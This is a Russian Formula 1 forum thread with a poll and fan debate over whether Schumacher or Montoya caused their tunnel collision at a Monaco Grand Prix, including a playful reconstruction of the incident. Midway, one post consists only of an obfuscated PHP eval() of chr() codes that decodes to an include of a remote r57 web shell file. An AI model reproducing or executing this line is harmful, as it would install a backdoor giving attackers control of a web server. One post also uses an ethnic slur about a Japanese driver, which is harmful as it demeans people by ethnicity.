Перейти к контенту

  

158 голосов

  1. 1. М.Шумахер - Х.-П.Монтойя. Тоннель.

    • М.Шумахер
      58
    • Х.-П.-Монтойя
      47
    • Оба пилота.
      23
    • Никто из них.
      13


Recommended Posts

Проголосовал за МШ.

Больше виноватых не вижу. <_<<_<

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Понятно, что виноват Монтойя. Если уже не верить себе, то хотя бы Кулхарду и Трулли( последний вообще за ними ехал и сказал, что думал, что они столкнуться еще до туннеля). И вообще, когда все остальные машины (это хорошо видно на повторе) ехали друг от друга на расстоянии приблезительно в два корпуса, то Монтойя приклеялся к Шуми. Наверняка его месть за Имолу была сладкая...

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

По моему мнению в первую очередь виноват Шумахер так как создал аварийную ситуацию, но не менее виноват Монтойя, так как не "притормозил". Короче замстил:)

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Виноватых, кроме МШ, тут и быть не может. :rolleyes:

Шумахера, кстати, можно было и бы наказать, если бы он как-то помешал вести дальнейшую гонку Монтое - он ведь его чуть-чуть не вынес... <_<

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

мш сам ошибся, сам вылетел, никого не взяв с собой

он не виноват

так получилось

это гонки (С)

не голосую B)

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах
Даже находящийся третим Трули признал, что Хуан был слишком близок к Михаэлю.

Однозначно круговой виноват. Если он вообще бывает виноват.

Мне кажеться перед уходом пейс кара, все стараются как можно ближе находиться от лидера, а Монтоя вообще его хотел обогнать! Он же пробывал догнать Барика у которого явно были проблемы и еще должен был быть один пит. Только потом команда поняла, что это бесполезно, но а на протяжение нескольких кругов он все же пытался. То, что Монти находился рядом с шумахером, я ничего в этом плохого не видел!

Настоящие профи никогда резко не тормозят на желтый мигающий! бояться удара в зад. Ил перед торможением смотрят в зеркало:) То , что я шума считаю профи - одназначно, просто ложанулся. Сам и пострадал....и по делом

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

я огорчен, ребята, ну сколько можно?? Исходя из какой информации вы высасываете свои мнения?? ОТКУДА вы знаете, что именно делали в эти доли секунды МШ и ХПМ, какова игра педалей, если не имеете даже элементарных онбоардов, я уже не говорю о данных телеметрии. Все, что у вас есть-2 камеры на стенке тоннеля

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Нафиг было такую тему создавать ... ? :D

Для болельщиков Шумахера виноват Монтойя, для остальных - Михаэль.

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Не понял в названии темы ТРИ виноватых. МШ, ХПМ и тоннель. А голосовать можно только за первых двух! Дедушка непорядок я считаю во все виноват тоннель! А проголосовать не могу, НЕПОРЯДОК!

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Глобально виновата вся команда BAR, узкоглазого надо было на втором круге уже заганять в боксы, однако Honda решила, что дымок - это просто Сато решил покурить, но дымок своё сделал. Если бы Сату убрали в боксы, возможно столкновения в тоннеле и не произошло бы. ( Если бы да кабы - в рту росли мухоморы).

А так считаю, что ХПМ обязан был держать необходимую безопасную дистанцию от впереди идущего автомобиля, тем более что не умеет быстро реагировать на торможение лидирующего.

С уважением ко всем любителям Ф1

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Виноват будущий семикратный...Так забавно начудил...А вообще я расцениваю случившееся как некое возмездие судьбы для него...

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Мое мнение такое - никто не виноват. ХПМ не виноват, что МШ решил резко затормозить и крутануть баранку направо. МШ не виноват, потому что не перед кем - он никого же не вынес :) . Если и виноват, то только перед самим собой, командой и болельщиками :)

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Некоторые не правильно воспринимают слово "виноват" в данном контексте. Виноват - не в смысле перед кем-то. А в смысле создал инцидент, или автор столкновения.

Я вижу это так: Был инцидент - столкновение с вылетом. У него есть пилот (пилоты), его создавший. В этом смысле виноватый есть в любом случае, поэтому вариант "никто" не катит.

У нас есть мало информации, как метко заметил Lich. ;)

Полная информация была у стюартов, они вынесли решение - никто не наказан.

Исходя из их решения можно сделать два предположения:

- никто не выноват, т.е. столкновение стало случайным стечением обстоятельств считаю маловероятным - не тот случай);

- виноват Шумахер, но уже сам себя наказал, закончив гонку.

Аналогично с Алонсо.

Вот такая вот формальная логика. ;)

:o

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах
Глобально виновата вся команда BAR, узкоглазого надо было на втором круге уже заганять в боксы, однако Honda решила, что дымок - это просто Сато решил покурить, но дымок своё сделал. Если бы Сату убрали в боксы, возможно столкновения в тоннеле и не произошло бы. ( Если бы да кабы - в рту росли мухоморы).

А так считаю, что ХПМ обязан был держать необходимую безопасную дистанцию от впереди идущего автомобиля, тем более что не умеет быстро реагировать на торможение лидирующего.

С уважением ко всем любителям Ф1

У вас, уважаемый из памяти вывалилось полгонки. :D МШ разбился под вторым пейскаром, вызванным вылетом Алонсо. А взрыв BARа Сато создал первы пейскар.

:o

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Подытожив прочитанное и увиденное...

Акутагаве Рюноске посвящается или "Что случилось в тоннеле"

Превью: "Барикелло-ХПМ" - "Я был пассажиром в своем болиде"

После ухода первого пейскара ХПМ делает Рубиньо как маленького. Барик жалуется на резинку: "В повороте Казино внезапно заблокировалось колесо - точно так же, как при повреждении покрышки. Я сказал команде по радио, что мне нужно сменить покрышки, но потом машина прошла круг нормально, а колеса снова и снова блокировались."

ХПМ не получает преимущества из обгона, т.к. едет на пит.

МШ Эпизод 1: После первой ямы он обгоняет Кими и Кнопкина, но к паре Рено особо не приближается – ждет «прикатки» Бриджа и расхода горючки. Получает информацию о траблах Барика с резиной, обгоне на рестарте.

МШ-ХПМ Эпизод 2: Вторая «иудейская машина» делает МШ лидером, а ХПМ – круговым (не заметил – заезжал ли ХПМ на яму под 2 пейсом???).

МШ – озабочен резиной и тормозами (см. Барик), а также необходимостью срочного создания отрыва, чтобы остаться в лидерах после второго пита (ИМХО – пит, все ж, должен был быть, и если не для топлива, то для новых покрышек – напомню про «супермягкий» Бридж). Думает и о том, чтобы не напороться на круговых, которые могли бы подпортить ему всю малину. Но круговые ему бы попались не скоро, т.к. весь пелетон собрался за «пейсом». Единственно возможный – Монти, если выскочит сзади на рестарте.

ХПМ – фрустрации на тему: «Ё-т-м! Я, прошлогодний «король» Монако, в глубокой заднице из-за этой гр..ной команды с ее гр..ой машиной и гр..ной тактикой». Понимает, что даже если выскочит впереди МШ, Барика хрен догонит – круг отставания в Монако не отыгрывается. Видит перед собой красную машинку с красным же шлёмом. Тихонько свирепеет. Едет вплотную за МШ полтора круга, рассчитывая все ж для острастки утереть тому нос на рестарте и попортить крови при дальнейшем обгоне на круг.

Кода: МШ получает инфу от Брауна о том, что пейс уходит в боксы. Кидается прогревать резину и тормоза в том месте, где по идее делать этого не следовало – мало ли, что осталось в тоннеле после полета Фонца (масло, обломки), да и нормальная (чистая) траектория одна. Как вариант – (см. трабл Барика) – по тех. причинам блокируется переднее левое колесо. Замедляется, но не чуя подвоха (сзади – круговые, всем тормозить-бояться! Равнение на лидера!) начинает выруливать на траекторию, т.е. дает вправо.

ХПМ: видя дым из-под колес Феррари №1, не тормозит, несказанно радуется и едет вправо на обгон, подозревая у МШ бзик или тех-трабл. Никто не осудит – за первым пейсом также на пару поворотов обогнал Барика – потом вернул позицию (эпизод, кстати, имевший место, но никем не принятый во внимание).

Касание практически сразу после апекса поворота. МШ – в рельс, Монти – «поехали»!

Монти – 5 очков. МШ – расхреначивает шлём о стенку в боксах, пьет водичку. Успокаивается…

Занавес. :ph34r:

По мотивам гонки покойный Акиро Куросава возвращается с того света и снимает фильм «Расёмон 2» с Такумой Сато в главной роли. :rolleyes:

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Хочу выразить свое частное мнение по поводу данного инцидента.

О целях участников данного ДТП.

На мой взгляд МШ имел шансы выграть данный ГП, тк после рестарта на более легкой и мощной машине вполне мог везти 1.5 сек с круга Трулю до своего питстопа. На питстоп ему необходимо где-то

24-25 сек (с учетом оставшихся до финиша кругов). Для того, чтобы максимально использовать рестарт и выйграть в этот момент у Трули 5-8 сек (а если Монтойя не сразу пропустит Труля, то и более) ему необходимо растянуть пелетон. Для этого надо переодически тормозить и разгоняться, чтобы нормальные (в смысле головы) пилоты держали безопастную (максимальную) дистанцию друг от друга.

Теперь о Монтойе. Судя по той дистанции, которую он держал от МШ, в момент рестарта он собирался пойти на обгон. А это ставило крест на шансах МШ (полный крест!!).

Возникает вопрос, зачем Монти обгонять МШ, если в следующем медленном повороте он должен его снова пропустить как круговой.

Поэтому, на мой взгляд, комментарий МШ (ГЛУПОСТЬ МОНТОЙИ) как нельзя лучше отражает реальность.

И в заключении хотелось бы добавить, что такую гонку - с реальной борьбой за победу до последнего круга было бы смотреть гораздо интереснее. Так что Монти лично мне испортил интересную гонку.

:wub:

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Проголосовал за то, что виноваты оба. Но больше виноват, всё-таки Монтойя. Потому что он:

а) был слишком близко к МШ, что не возбраняется, но возлагает ответственность в случае столкновения на идущего сзади;

б) не затормозил, когда увидел, что Шумахер замедлился, а просто дёрнул руль вправо; очевидная неадекватная реакция.

Если уж совсем честно, то по букве закона виноват только Монтойя, но я голосовал за обоюдную вину, потому что так прогревать тормоза, как делал Шумахер некорректно по отношению к соперникам. А соперников надо уважать. Я не думаю, что на самом деле Чарли Уайтинг расценил это как чисто гоночный инцидент. Скорее всего, Монтойе сказали: "Ещё раз - и штрафной балл", но вынесение этого на публику посчитали неправильным.

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Max! Респект ,классный спитч.Думаю именно так все и было. :)

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Max, отлично! оч.понравилось. :)

ХПМ – круговым (не заметил – заезжал ли ХПМ на яму под 2 пейсом?

Каэншна! А как бы иначе он стал круговым? В этом-то и прикол, заехали все, кто "должен был", кроме МШ. И этим своим непосещением боксов он и оставил ХПМ в круге от себя.

за первым пейсом Монти также на пару поворотов обогнал Барика – потом вернул позицию (эпизод, кстати, имевший место, но никем не принятый во внимание)

...потому что это нормально. Барик же не пытался захлопнуть калитку, вот и приехал на подиум. ;)

:o

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах
После ухода первого пейскара ХПМ делает Рубиньо как маленького. Барик жалуется на резинку: "В повороте Казино внезапно заблокировалось колесо - точно так же, как при повреждении покрышки. Я сказал команде по радио, что мне нужно сменить покрышки, но потом машина прошла круг нормально, а колеса снова и снова блокировались."

Тебе напомнить, кто, когда и в каких случаях на резинку жалуется, или сам догадаешься? :p

А в гонках используют шины, которые иногда называют резиной, но никак не резинкой. :angry:

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Mouser

"Цепь следующих событий есть результат предыдущих".

Не видел смысла описывать все события произошедшие с момента выхода на трассу 1-го SC до момента столкновения в тоннеле.

Считаю, что BAR должна была зазвать Сату в боксы. Всю нервозность гонке появилась именно после этой аварии - в итоге 9 машин не финише, 4 авто - аварии из-за действий других гонщиков.

С уважением к поклонникам Ф1

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах
Max, отлично! оч.понравилось. :)
ХПМ – круговым (не заметил – заезжал ли ХПМ на яму под 2 пейсом?

Каэншна! А как бы иначе он стал круговым? В этом-то и прикол, заехали все, кто "должен был", кроме МШ. И этим своим непосещением боксов он и оставил ХПМ в круге от себя.

за первым пейсом Монти также на пару поворотов обогнал Барика – потом вернул позицию (эпизод, кстати, имевший место, но никем не принятый во внимание)

...потому что это нормально. Барик же не пытался захлопнуть калитку, вот и приехал на подиум. ;)

:o

Это может быть и нормально, но Шумми не пытался захлопнуть калитку, а возвращался на траекторию, чтобы там восстановить полный контроль над машиной (потому что там сцепление лучше; он, видимо, испугался повторения подвига Алонсо). А насчёт обгона под пейс-каром... Пока за него не наказывали, но ведь и за обгон на прогревочном круге никого не наказывали до Сильверстоуна-94, когда срочно понадобилось обострить интригу. А правило-то было задолго до этого. Вот и думай...

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах
Тебе напомнить, кто, когда и в каких случаях на резинку жалуется, или сам догадаешься? :p

А в гонках используют шины, которые иногда называют резиной, но никак не резинкой. :angry:

Значит, для тех, кто сердцем молод... Поясняю - Барик жаловался на некоторые обстоятельства своего появления на свет :D:D

Поделиться этим сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или авторизуйтесь, чтобы оставить комментарий

Комментарии могут оставлять только зарегистрированные пользователи

Создать аккаунт

Зарегистрировать новый аккаунт в нашем сообществе. Это несложно!

Зарегистрировать новый аккаунт

Войти

Есть аккаунт? Войти.

Войти

  • Недавно просматривали   0 пользователей

    Ни один зарегистрированный пользователь не просматривает эту страницу.

×
×
  • Создать...